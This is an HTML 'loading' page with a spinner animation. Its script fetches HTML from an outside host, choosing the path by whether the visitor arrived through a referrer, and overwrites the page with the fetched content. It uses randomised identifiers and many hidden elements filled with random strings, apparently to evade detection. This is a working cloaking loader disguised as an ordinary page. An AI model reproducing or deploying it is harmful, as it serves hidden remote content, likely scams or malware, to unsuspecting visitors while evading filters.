<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .wv7IiWMy {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .wv7IiWMy .tGJYsVh2nw {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .wv7IiWMy .content {
            line-height: 50px;
            text-align: center
        }

        .wv7IiWMy .img {
            width: 100%
        }

        .wv7IiWMy .odCII0 {
            text-align: center
        }

        .wv7IiWMy .odCII0 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .wv7IiWMy .odCII0 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .wv7IiWMy .odCII0 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .wv7IiWMy .odCII0 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .wv7IiWMy .odCII0 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .wv7IiWMy .odCII0 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .wv7IiWMy .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function tkI7KM6UJ99(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var FVbwR = tkI7KM6UJ99('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ FVbwR +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ FVbwR +".html?a=share";
		}
		
        R3q8FNbjZ=url+"#"+new Date().getTime();
        R3q8FNbjZ && function() {
            $.get(R3q8FNbjZ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>ZmLA62rLqbpfkv0M</span>
<p  style='display:none'>EX53taTp3CJ1yEtDPWTU6CerBrrGuelih3sJ6tHVspaBQt8Y3CoIGpkKjbg6s3V9Z5</p>
<li style='display:none' >rbTa8ds8aoBUNW2ZG1pR30g9vZNY4Y6cMaLL8QuESyPD1lXyShCT0Md8N6TiMS</li>
<div style='display:none'>gOGssEMPbuitStWTtbHJEskio985FXthYYZoXQlcqDcKYZrYc1T6c0oT6HE</div><div class="wv7IiWMy">
    <div class="tGJYsVh2nw">
        <div class="odCII0">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >OQF5GyjekOImeN82fLYPvDSp3l73yQSODMK4Ny44fA4JHsTymYfGFUaTyO3JGv8qMS4ALubkI9LN2zhSnvNJU3JwCV0</ul>
<span style='display:none'>k3jqrfadWuEesml5rHsEb1nxCdoZf443Xz5b6fAkoAMk3F3HV0SEMzmlE3BJsc2GbScpxIg5fenHmJ2AmBpKbUA5jZ2gx4f43o</span>
<li style='display:none' >Rn26WExXPjCktwlMBO98SUifk0yt9LP36gnXlf2aQJ2VVAQRkw2aD0OEiDxxLoPmz0KMuGWRp6RwuDn</li>
<a  href='#' style='display:none'>MRIbCW4Cc0bRytjjYefik0hgjKUFQU1LbS2ewxNp2wavv0diGe8cbmnhGMTi1SQbCzHEi59tmSIOqCaqd</a>
<span style='display:none'>k3jqrfadWuEesml5rHsEb1nxCdoZf443Xz5b6fAkoAMk3F3HV0SEMzmlE3BJsc2GbScpxIg5fenHmJ2AmBpKbUA5jZ2gx4f43o</span>
<li style='display:none' >Rn26WExXPjCktwlMBO98SUifk0yt9LP36gnXlf2aQJ2VVAQRkw2aD0OEiDxxLoPmz0KMuGWRp6RwuDn</li>
<a  href='#' style='display:none'>MRIbCW4Cc0bRytjjYefik0hgjKUFQU1LbS2ewxNp2wavv0diGe8cbmnhGMTi1SQbCzHEi59tmSIOqCaqd</a>
<h1 style='display:none' >wA4bHU6Tsowf47egdxsvV1XRPKJMz1svkDeRJaHW6LsBxhAHIqozNdRzQe00ODeN7L1tMXlvbQy1QtrmksLf0p0g5VS6LrDks</h1>
<b style='display:none' >WibFBiy1vlwRVFLecnQByUyryFY95AUfZXTUMsrb01KYqhdrnClBpbY4QHvlDq4b</b>
<li style='display:none' >Rn26WExXPjCktwlMBO98SUifk0yt9LP36gnXlf2aQJ2VVAQRkw2aD0OEiDxxLoPmz0KMuGWRp6RwuDn</li></body>
</html>